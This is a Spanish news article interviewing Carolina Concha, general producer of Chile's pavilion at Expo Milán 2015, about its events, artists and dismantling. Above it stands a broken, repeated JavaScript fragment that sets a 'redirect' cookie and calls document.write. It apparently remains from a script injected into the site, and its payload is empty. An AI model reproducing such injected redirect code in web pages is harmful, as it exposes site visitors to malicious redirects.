=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

Carolina Concha: “La calidad humana en El Amor de Chile nos invadió a todos”

4 Feb 2016

Compartir:

Fueron más de un centenar las presentaciones artísticas, culturales y gremiales que se realizaron en el pabellón de Chile durante Expo Milán 2015. Tanto su variedad, como el rescate de las tradiciones de nuestro territorio, constituyeron el  sello que hizo relucir a la propuesta nacional. Sin duda que esta ardua tarea requirió de una intensa coordinación, y en ese rol la productora general del proyecto, Carolina Concha, jugó un rol fundamental para dar vida a las actividades que nos representaron a más de 11 mil kilómetros.

Desde que se enteró del proyecto a finales del 2013, la profesional con una amplia carrera en producción televisiva, se unió al equipo unas semanas antes de la inauguración, contando que el desafío fue “implementar los eventos y actividades con mucha rapidez frente a las eventualidades. Con mi equipo sacábamos hasta cuatro eventos por día, por lo que el trabajo fue realmente 24/7, sumando la presión de ir aumentando cada día la cantidad de visitas”, dice agradeciendo el compromiso y apoyo de todos.

Con respecto a su experiencia en el pabellón, Carolina destaca que “todos sentíamos mucha satisfacción, pero no sólo por representar al país, sino por la calidad humana y de grupo que se formó. Cuando uno vive fuera de Chile aprende a valorizar su tierra, y ver la respuesta positiva de los visitantes era muy gratificante. Trabajamos bastante, a ratos muchísimo, pero cuando las cosas se hacen de corazón siempre los resultados serán óptimos”.

Carolina subraya la excelencia y profesionalismo de la propuesta nacional, partiendo con su rol en la  promoción de las pymes, donde “pudieron mostrar la calidad de nuestros productos en Europa, también el tema de las cocineras era muy bonito, la gente tenía ganas de conocer nuestros platos e ingredientes”. Sobre las presentaciones artísticas, dice que cada semana era más alucinante, contando que “por ejemplo los chinchineros reventaban el pabellón cuando iban, era una locura, también personajes como Antonio Paillafil mostraron una  profundidad única. Ahí te das cuenta de lo poco que conocemos de nuestras raíces”, dice, confesando que las presentaciones que más la emocionaron fue Mahani Teave junto a Enrique Icka en la semana Rapanui, y organizar la “fiesta” que fue la presentación de Inti-Illimani histórico en el Open Air Theatre.

Sobre los desafíos actuales, cuenta que el equipo está enfocado en el proceso de desmontaje, el cual va en un 30% de avance. “Es un poco triste ver como desaparece, porque esta estructura se lleva toda nuestra pasión vivida durante seis meses. Acá respiramos y sudamos el proyecto, por lo que es importante que a vuelta a Chile sea perfecta. Yo creo que la palabra amor implica crear, y en ese sentido El Amor de Chile mostró lo que somos y por ello desearía que todos puedan vivirlo tal cual estuvo acá”.

Partners

Media Partner